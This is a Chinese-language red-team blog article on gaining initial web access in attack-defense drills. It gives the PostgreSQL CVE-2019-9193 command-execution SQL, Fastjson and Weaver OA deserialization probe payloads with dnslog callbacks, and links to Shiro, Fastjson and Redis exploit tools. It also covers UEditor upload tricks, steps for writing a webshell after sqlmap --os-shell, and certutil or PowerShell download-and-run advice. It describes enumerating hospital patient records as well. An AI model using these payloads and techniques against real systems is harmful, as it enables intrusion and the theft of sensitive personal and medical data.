原文: https://xz.aliyun.com/t/10400 Author: 0ne
思路朴素不包含钓鱼和叼炸天的0day
。权限
&数据
:权限类型分为系统权限和应用权限,权限高低又分为管理员权限和普通用户权限。数据一般是要四件套,姓名,手机号,身份证,住址。通常敏感数据这样定义,不过看当前的应用可能敏感信息的定义又会不同,比如医院系统,病例信息就算是敏感数据。弱口令是永远修复不了的漏洞,每场攻防演练都会有弱口令撕开的口子(出现次数 29
)
好用的字典
https://github.com/fuzz-security/SuperWordlist
https://github.com/gh0stkey/Web-Fuzzing-Box
PostgreSQL(从版本9.3至11.2)任意命令执行漏洞(CVE-2019-9193)
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'whoami';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
Redis
https://github.com/Dliv3/redis-rogue-server
https://github.com/0671/RedisModules-ExecuteCommand-for-Windows
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
https://github.com/r35tart/RedisWriteFile
YY的没打过QAQ
]https://xz.aliyun.com/t/8153
https://xz.aliyun.com/t/7940
VPN弱口令
Jenkins弱口令
Adminer弱口令
shiro永远的神!没有shiro我都不知道怎么日站了(出现次数 28
)
https://github.com/pmiaowu/BurpShiroPassiveScan
https://github.com/wyzxxz/shiro_rce_tool
https://github.com/j1anFen/shiro_attack
朴实无华(出现次数 10
)
也好用(出现次数 6
)
{"rand1":{"@type":"java.net.InetAddress","val":"gbi7ge.dnslog.cn"}}
{"rand2":{"@type":"java.net.Inet4Address","val":"gbi7ge.dnslog.cn"}}
{"rand3":{"@type":"java.net.Inet6Address","val":"gbi7ge.dnslog.cn"}}
https://www.sec-in.com/article/950
https://xz.aliyun.com/t/7568
好用的tools:
https://github.com/pmiaowu/BurpFastJsonScan
https://github.com/wyzxxz/fastjson_rce_tool
https://github.com/feihong-cs/JNDIExploit
苍蝇再小也是肉(出现次数
5
)
医院啊,这个比较多遇见的案例都是微信公众号或是小程序,遍历病例数据:
还遇见了swagger信息泄露构造接口查询:
UEditor1.4.3任意文件上传
出其不意(出现次数5
)
当遇见.NET的网站时,右键查看图片URL为~/ueditor~/upload/image/[20200101]这种年月格式/25位数字.png,就可以判断该站点使用了UEditor[直接目录扫描工具扫也行],就需要我们拼接出路径~/net/controller.ashx
:
~前面可能不太固定需要自己在JS里找信息,或是合理猜测。
提一嘴,之前遇见个站点.png?.aspx
,站点返回了404,可以直接.png.aspx
,同时UEditor有过滤?的特性,在有WAF的时候可酌情使用。
基操
--os-shell后,得到一个命令行,一般是certutil下载执行或是powershell直接上线。也可写入webshell:
找静态资源定位物理路径
for /r C:\ %i in (*xxx*) do @echo %i
dir /s/a-d/b C:\*xxx.xxx
echo ^<一句话^> >C:\phpstudy_pro\WWW\shell.txt
<>注意使用^转义
没啥说的,有0day砸0day
泛*OA,致*OA,通*OA,用*NC
github搜搜搜,内部自己有积累未批露利用点最好。
泛*OA的两个案例用的WorkflowServiceXml反序列化
比较丝滑。
判断是否可利用:
POST /services%20/WorkflowServiceXml HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 523
Content-Type: text/xml;charest=UTF-8<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:doCreateWorkflowRequest>
<web:string>
<map>
<entry>
<url>http://m5alw5.dnslog.cn</url>
<string>http://m5alw5.dnslog.cn</string>
</entry>
</map>
</web:string>
<web:string>2</web:string>
</web:doCreateWorkflowRequest>
</soapenv:Body>
</soapenv:Envelope>
胡言乱语
SQL注入获取敏感数据感觉没啥提的,记得sqlmap加上参数random-agent。
S2在外网见的少了,也不知道大佬咋翻墙进去的。
历史遗留后门404.jsp成了入口点也是离谱。
各种debug信息泄露云key导入行云管家证明权限就OK。
已经语无伦次了......
柿子捡软的捏
web打点本就是个效率活,打得就是软柿子,不要给你一个站点测了半天到最后才发现:咦这里有个上传/shiro/fastjson....这就耽误功夫了,要带着目的性,尽量减少试错的过程,少做无用功。
侵权请私聊公众号删文
推荐阅读
学习更多技术,关注我:
觉得文章不错给点个‘再看’吧